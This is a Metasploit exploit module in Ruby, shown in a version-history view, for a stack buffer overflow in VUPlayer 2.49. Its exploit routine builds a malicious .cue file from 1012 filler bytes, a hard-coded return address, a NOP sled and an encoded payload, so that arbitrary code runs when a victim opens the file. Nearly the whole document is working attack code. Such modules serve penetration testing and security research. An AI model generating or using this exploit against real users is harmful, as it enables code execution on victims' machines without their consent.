Files
metasploit-gs/modules/exploits/windows/fileformat/vuplayer_cue.rb
T

74 lines
1.9 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 16:28:54 -05:00
Rank = GoodRanking
2013-08-30 16:28:54 -05:00
include Msf::Exploit::FILEFORMAT
2010-01-28 20:15:32 +00:00
2013-08-30 16:28:54 -05:00
def initialize(info = {})
super(update_info(info,
'Name' => 'VUPlayer CUE Buffer Overflow',
'Description' => %q{
2017-09-13 22:03:34 -04:00
This module exploits a stack based overflow in VUPlayer <= 2.49. When
the application is used to open a specially crafted cue file, a buffer is overwritten allowing
2013-08-30 16:28:54 -05:00
for the execution of arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'References' =>
[
[ 'OSVDB', '64581'],
2013-08-30 16:28:54 -05:00
[ 'BID', '33960' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
2020-01-14 20:47:27 -05:00
'DisablePayloadHandler' => true,
'AllowWin32SEH' => true
2013-08-30 16:28:54 -05:00
},
'Payload' =>
{
'Space' => 750,
'BadChars' => "\x00",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'VUPlayer 2.49', { 'Ret' => 0x1010539f } ],
],
'Privileged' => false,
'DisclosureDate' => 'Aug 18 2009',
'DefaultTarget' => 0))
2013-08-30 16:28:54 -05:00
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.cue']),
])
2013-08-30 16:28:54 -05:00
end
2013-08-30 16:28:54 -05:00
def exploit
2013-08-30 16:28:54 -05:00
sploit = rand_text_alpha_upper(1012)
sploit << [target.ret].pack('V')
sploit << "\x90" * 12
sploit << payload.encoded
2013-08-30 16:28:54 -05:00
cue = "FILE ""\""
cue << sploit
cue << ".BIN""\"" + " BINARY\r\n"
cue << "TRACK 01 MODE1/22352\r\n"
cue << "INDEX 01 00:00:00\r\n"
2010-01-28 20:15:32 +00:00
2013-08-30 16:28:54 -05:00
print_status("Creating '#{datastore['FILENAME']}' file ...")
2013-08-30 16:28:54 -05:00
file_create(cue)
2010-01-28 20:15:32 +00:00
2013-08-30 16:28:54 -05:00
end
end